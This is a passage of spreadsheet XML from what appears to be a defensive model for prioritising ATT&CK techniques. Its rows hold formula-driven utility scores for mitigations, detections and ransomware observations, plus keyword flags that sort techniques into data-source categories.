        <v>0</v>
      </c>
      <c r="N357" s="56">
        <v>0</v>
      </c>
      <c r="O357" s="56">
        <v>2</v>
      </c>
      <c r="P357" s="56">
        <v>2</v>
      </c>
      <c r="Q357" s="56">
        <v>3</v>
      </c>
      <c r="R357" s="57" t="s">
        <v>1256</v>
      </c>
      <c r="S357" s="57">
        <v>7</v>
      </c>
      <c r="T357" s="57" t="s">
        <v>1257</v>
      </c>
      <c r="U357" s="57">
        <v>2</v>
      </c>
      <c r="V357" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.11904742857142858</v>
      </c>
      <c r="W357" s="37">
        <v>9</v>
      </c>
      <c r="X357" s="37">
        <v>0.163636</v>
      </c>
      <c r="Y357" s="37">
        <v>0.163636</v>
      </c>
      <c r="Z357" s="37">
        <v>7</v>
      </c>
      <c r="AA357" s="37">
        <v>7.0000000000000007E-2</v>
      </c>
      <c r="AB357" s="37">
        <v>7.0000000000000007E-2</v>
      </c>
      <c r="AC357" s="37"/>
      <c r="AD357" s="50" t="s">
        <v>1121</v>
      </c>
      <c r="AE357" s="37" t="str" cm="1">
        <f t="array" ref="AE357">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD357)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF357" s="37">
        <v>353</v>
      </c>
      <c r="AG357" s="37" t="str" cm="1">
        <f t="array" ref="AG357">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD357)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH357" s="37">
        <v>353</v>
      </c>
      <c r="AI357" s="37" t="str" cm="1">
        <f t="array" ref="AI357">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD357)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ357" s="37">
        <v>353</v>
      </c>
      <c r="AK357" s="37" t="str" cm="1">
        <f t="array" ref="AK357">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD357)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL357" s="37">
        <v>353</v>
      </c>
      <c r="AM357" s="37" t="str" cm="1">
        <f t="array" ref="AM357">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD357)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN357" s="37">
        <v>0</v>
      </c>
      <c r="AO357" s="37">
        <v>0</v>
      </c>
      <c r="AP357" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ357" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>103.17133885714287</v>
      </c>
      <c r="AR357" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS357" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT357" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU35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58" spans="1:47" ht="51">
      <c r="A358" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B358" s="37">
        <f t="shared" si="5"/>
        <v>175.43809523809526</v>
      </c>
      <c r="C358" s="37" t="s">
        <v>1258</v>
      </c>
      <c r="D358" s="50" t="s">
        <v>1215</v>
      </c>
      <c r="E358" s="37" t="s">
        <v>1259</v>
      </c>
      <c r="F358" s="37">
        <v>1</v>
      </c>
      <c r="G358" s="37">
        <v>1</v>
      </c>
      <c r="H358" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I358" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J358" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K358" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L358" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M358" s="37">
        <v>0</v>
      </c>
      <c r="N358" s="56">
        <v>0</v>
      </c>
      <c r="O358" s="56">
        <v>2</v>
      </c>
      <c r="P358" s="56">
        <v>1</v>
      </c>
      <c r="Q358" s="56">
        <v>2</v>
      </c>
      <c r="R358" s="57"/>
      <c r="S358" s="57">
        <v>0</v>
      </c>
      <c r="T358" s="57"/>
      <c r="U358" s="57">
        <v>0</v>
      </c>
      <c r="V358" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>2.3809523809523808E-2</v>
      </c>
      <c r="W358" s="37">
        <v>0</v>
      </c>
      <c r="X358" s="37">
        <v>0</v>
      </c>
      <c r="Y358" s="37">
        <v>0</v>
      </c>
      <c r="Z358" s="37">
        <v>5</v>
      </c>
      <c r="AA358" s="37">
        <v>0.05</v>
      </c>
      <c r="AB358" s="37">
        <v>0.05</v>
      </c>
      <c r="AC358" s="37"/>
      <c r="AD358" s="50" t="s">
        <v>1220</v>
      </c>
      <c r="AE358" s="37" t="str" cm="1">
        <f t="array" ref="AE358">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD358)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF358" s="37">
        <v>354</v>
      </c>
      <c r="AG358" s="37" t="str" cm="1">
        <f t="array" ref="AG358">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD358)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH358" s="37">
        <v>354</v>
      </c>
      <c r="AI358" s="37" t="str" cm="1">
        <f t="array" ref="AI358">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD358)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ358" s="37">
        <v>354</v>
      </c>
      <c r="AK358" s="37" t="str" cm="1">
        <f t="array" ref="AK358">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD358)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL358" s="37">
        <v>354</v>
      </c>
      <c r="AM358" s="37" t="str" cm="1">
        <f t="array" ref="AM358">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD358)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN358" s="37">
        <v>0</v>
      </c>
      <c r="AO358" s="37">
        <v>0</v>
      </c>
      <c r="AP358" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ358" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>58.479365079365088</v>
      </c>
      <c r="AR358" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS358" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT358" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU35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59" spans="1:47" ht="34">
      <c r="A359" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="B359" s="37">
        <f t="shared" si="5"/>
        <v>412.76686966666665</v>
      </c>
      <c r="C359" s="37" t="s">
        <v>1260</v>
      </c>
      <c r="D359" s="50" t="s">
        <v>1215</v>
      </c>
      <c r="E359" s="37" t="s">
        <v>1261</v>
      </c>
      <c r="F359" s="37">
        <v>1</v>
      </c>
      <c r="G359" s="37">
        <v>1</v>
      </c>
      <c r="H359" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I359" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J359" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K359" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L359" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M359" s="37">
        <v>0</v>
      </c>
      <c r="N359" s="56">
        <v>0</v>
      </c>
      <c r="O359" s="56">
        <v>3</v>
      </c>
      <c r="P359" s="56">
        <v>1</v>
      </c>
      <c r="Q359" s="56">
        <v>0</v>
      </c>
      <c r="R359" s="57" t="s">
        <v>1262</v>
      </c>
      <c r="S359" s="57">
        <v>8</v>
      </c>
      <c r="T359" s="57" t="s">
        <v>1263</v>
      </c>
      <c r="U359" s="57">
        <v>10</v>
      </c>
      <c r="V359" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.19047633333333333</v>
      </c>
      <c r="W359" s="37">
        <v>18</v>
      </c>
      <c r="X359" s="37">
        <v>0.32727299999999998</v>
      </c>
      <c r="Y359" s="37">
        <v>0.32727299999999998</v>
      </c>
      <c r="Z359" s="37">
        <v>4</v>
      </c>
      <c r="AA359" s="37">
        <v>0.04</v>
      </c>
      <c r="AB359" s="37">
        <v>0.04</v>
      </c>
      <c r="AC359" s="37"/>
      <c r="AD359" s="50" t="s">
        <v>286</v>
      </c>
      <c r="AE359" s="37" t="str" cm="1">
        <f t="array" ref="AE359">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD359)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF359" s="37">
        <v>355</v>
      </c>
      <c r="AG359" s="37" t="str" cm="1">
        <f t="array" ref="AG359">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD359)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH359" s="37">
        <v>355</v>
      </c>
      <c r="AI359" s="37" t="str" cm="1">
        <f t="array" ref="AI359">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD359)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ359" s="37">
        <v>355</v>
      </c>
      <c r="AK359" s="37" t="str" cm="1">
        <f t="array" ref="AK359">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD359)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL359" s="37">
        <v>355</v>
      </c>
      <c r="AM359" s="37" t="str" cm="1">
        <f t="array" ref="AM359">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD359)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN359" s="37">
        <v>0</v>
      </c>
      <c r="AO359" s="37">
        <v>1</v>
      </c>
      <c r="AP359" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AQ359" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>137.58895655555554</v>
      </c>
      <c r="AR359" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS359" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT359" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU35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3.2997370608465606</v>
      </c>
    </row>
    <row r="360" spans="1:47" ht="34">
      <c r="A360" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B360" s="37">
        <f t="shared" si="5"/>
        <v>325.71442142857143</v>
      </c>
      <c r="C360" s="37" t="s">
        <v>1264</v>
      </c>
      <c r="D360" s="50" t="s">
        <v>1215</v>
      </c>
      <c r="E360" s="37" t="s">
        <v>1265</v>
      </c>
      <c r="F360" s="37">
        <v>1</v>
      </c>
      <c r="G360" s="37">
        <v>1</v>
      </c>
      <c r="H360" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I360" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J360" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K360" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L360" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M360" s="37">
        <v>0</v>
      </c>
      <c r="N360" s="56">
        <v>0</v>
      </c>
      <c r="O360" s="56">
        <v>1</v>
      </c>
      <c r="P360" s="56">
        <v>2</v>
      </c>
      <c r="Q360" s="56">
        <v>0</v>
      </c>
      <c r="R360" s="57" t="s">
        <v>146</v>
      </c>
      <c r="S360" s="57">
        <v>6</v>
      </c>
      <c r="T360" s="57" t="s">
        <v>1266</v>
      </c>
      <c r="U360" s="57">
        <v>6</v>
      </c>
      <c r="V360" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.1285715238095238</v>
      </c>
      <c r="W360" s="37">
        <v>12</v>
      </c>
      <c r="X360" s="37">
        <v>0.21818199999999999</v>
      </c>
      <c r="Y360" s="37">
        <v>0.21818199999999999</v>
      </c>
      <c r="Z360" s="37">
        <v>3</v>
      </c>
      <c r="AA360" s="37">
        <v>0.03</v>
      </c>
      <c r="AB360" s="37">
        <v>0.03</v>
      </c>
      <c r="AC360" s="37"/>
      <c r="AD360" s="50" t="s">
        <v>286</v>
      </c>
      <c r="AE360" s="37" t="str" cm="1">
        <f t="array" ref="AE360">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD360)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF360" s="37">
        <v>356</v>
      </c>
      <c r="AG360" s="37" t="str" cm="1">
        <f t="array" ref="AG360">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD360)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH360" s="37">
        <v>356</v>
      </c>
      <c r="AI360" s="37" t="str" cm="1">
        <f t="array" ref="AI360">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD360)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ360" s="37">
        <v>356</v>
      </c>
      <c r="AK360" s="37" t="str" cm="1">
        <f t="array" ref="AK360">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD360)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL360" s="37">
        <v>356</v>
      </c>
      <c r="AM360" s="37" t="str" cm="1">
        <f t="array" ref="AM360">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD360)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN360" s="37">
        <v>0</v>
      </c>
      <c r="AO360" s="37">
        <v>0</v>
      </c>
      <c r="AP360" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ360" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>108.57147380952381</v>
      </c>
      <c r="AR360" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS360" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT360" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU36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61" spans="1:47" ht="51">
      <c r="A361" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="B361" s="37">
        <f t="shared" si="5"/>
        <v>244.97142857142856</v>
      </c>
      <c r="C361" s="37" t="s">
        <v>1267</v>
      </c>
      <c r="D361" s="50" t="s">
        <v>1215</v>
      </c>
      <c r="E361" s="37" t="s">
        <v>1268</v>
      </c>
      <c r="F361" s="37">
        <v>1</v>
      </c>
      <c r="G361" s="37">
        <v>1</v>
      </c>
      <c r="H361" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I361" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J361" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K361" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L361" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M361" s="37">
        <v>0</v>
      </c>
      <c r="N361" s="56">
        <v>1</v>
      </c>
      <c r="O361" s="56">
        <v>9</v>
      </c>
      <c r="P361" s="56">
        <v>1</v>
      </c>
      <c r="Q361" s="56">
        <v>4</v>
      </c>
      <c r="R361" s="57"/>
      <c r="S361" s="57">
        <v>0</v>
      </c>
      <c r="T361" s="57"/>
      <c r="U361" s="57">
        <v>0</v>
      </c>
      <c r="V361" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>7.1428571428571425E-2</v>
      </c>
      <c r="W361" s="37">
        <v>0</v>
      </c>
      <c r="X361" s="37">
        <v>0</v>
      </c>
      <c r="Y361" s="37">
        <v>0</v>
      </c>
      <c r="Z361" s="37">
        <v>15</v>
      </c>
      <c r="AA361" s="37">
        <v>0.15</v>
      </c>
      <c r="AB361" s="37">
        <v>0.15</v>
      </c>
      <c r="AC361" s="37"/>
      <c r="AD361" s="50" t="s">
        <v>1241</v>
      </c>
      <c r="AE361" s="37" t="str" cm="1">
        <f t="array" ref="AE361">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD361)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF361" s="37">
        <v>357</v>
      </c>
      <c r="AG361" s="37" t="str" cm="1">
        <f t="array" ref="AG361">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD361)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH361" s="37">
        <v>357</v>
      </c>
      <c r="AI361" s="37" t="str" cm="1">
        <f t="array" ref="AI361">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD361)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ361" s="37">
        <v>357</v>
      </c>
      <c r="AK361" s="37" t="str" cm="1">
        <f t="array" ref="AK361">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD361)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL361" s="37">
        <v>357</v>
      </c>
      <c r="AM361" s="37" t="str" cm="1">
        <f t="array" ref="AM361">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD361)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN361" s="37">
        <v>0</v>
      </c>
      <c r="AO361" s="37">
        <v>1</v>
      </c>
      <c r="AP361" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AQ361" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>81.657142857142858</v>
      </c>
      <c r="AR361" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS361" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT361" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU36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1.9680272108843535</v>
      </c>
    </row>
    <row r="362" spans="1:47" ht="34">
      <c r="A362" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B362" s="37">
        <f t="shared" si="5"/>
        <v>143.30000000000001</v>
      </c>
      <c r="C362" s="37" t="s">
        <v>1269</v>
      </c>
      <c r="D362" s="50" t="s">
        <v>1215</v>
      </c>
      <c r="E362" s="37" t="s">
        <v>1270</v>
      </c>
      <c r="F362" s="37">
        <v>1</v>
      </c>
      <c r="G362" s="37">
        <v>1</v>
      </c>
      <c r="H362" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I362" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J362" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K362" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L362" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M362" s="37">
        <v>0</v>
      </c>
      <c r="N362" s="56">
        <v>0</v>
      </c>
      <c r="O362" s="56">
        <v>0</v>
      </c>
      <c r="P362" s="56">
        <v>0</v>
      </c>
      <c r="Q362" s="56">
        <v>0</v>
      </c>
      <c r="R362" s="57"/>
      <c r="S362" s="57"/>
      <c r="T362" s="57"/>
      <c r="U362" s="57"/>
      <c r="V362" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W362" s="37">
        <v>0</v>
      </c>
      <c r="X362" s="37">
        <v>0</v>
      </c>
      <c r="Y362" s="37">
        <v>0</v>
      </c>
      <c r="Z362" s="37">
        <v>0</v>
      </c>
      <c r="AA362" s="37">
        <v>0</v>
      </c>
      <c r="AB362" s="37">
        <v>0</v>
      </c>
      <c r="AC362" s="37"/>
      <c r="AD362" s="50" t="s">
        <v>957</v>
      </c>
      <c r="AE362" s="37" t="str" cm="1">
        <f t="array" ref="AE362">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD362)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
